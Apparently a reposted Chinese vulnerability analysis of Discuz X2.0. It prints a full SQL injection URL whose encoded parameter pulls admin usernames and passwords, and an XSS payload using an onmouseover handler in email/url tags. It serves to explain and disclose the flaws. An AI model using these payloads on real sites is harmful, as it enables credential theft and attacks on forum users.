互联网

Discuzx2.0的最新漏洞分析

Discuzx2.0的最新漏洞分析

  从而完整的攻击语句如下:

  http://target/forum.php?mod=attachment&findpost=imiyoo&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsY29uY2F0KHVzZXJuYW1lLDB4N0MscGFzc3dvcmQpIGZyb20gcHJlX2NvbW1vbl9tZW1iZXIgd2hlcmUgIHVzZXJuYW1lIGxpa2UgJ2FkbWlufE5ldmVsfE5ldmVsfE5ldmVsfE5ldmVs

  攻击效果如下图:

ddddd.png

  XSS问题描述:

  XSS是一种客户端攻击方式,攻击者可以可以向Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而可以达到恶意攻击用户的特殊目的。利用该XSS漏洞,攻击者可以实现1 网站挂马 2 网站钓鱼 3 CSRF攻击;危害等级中.

  分析报告:

  具体原因发生在source/function/function_discuzcode.php中的,在discuzcode函数中,我们可以看到,程序员直接将用户输入的[emai][/email]信息利用preg_replace函数进行替换,但在该函数中存在一个问题,当用户提交的变量中含有双引号等特殊字符的时候,函数会将它们转义后再进行输出,而程序作者没有对其进行过滤,就传给了parseemail函数;sdfsdfsdf.png

  在parseemail函数,如下:

test.png

  其中$text变量也是没有进行过滤,就直接输出到客户端,从而造成了XSS漏洞。

  构造Xss_Exploit如下:

  [email][url]”http://www.imiyoo.com onmouseover=alert(/Discuz-XSS-Exploit/); “[/url][/email]

 

[!--page.stats—]
希望看到您的想法,请您发表评论x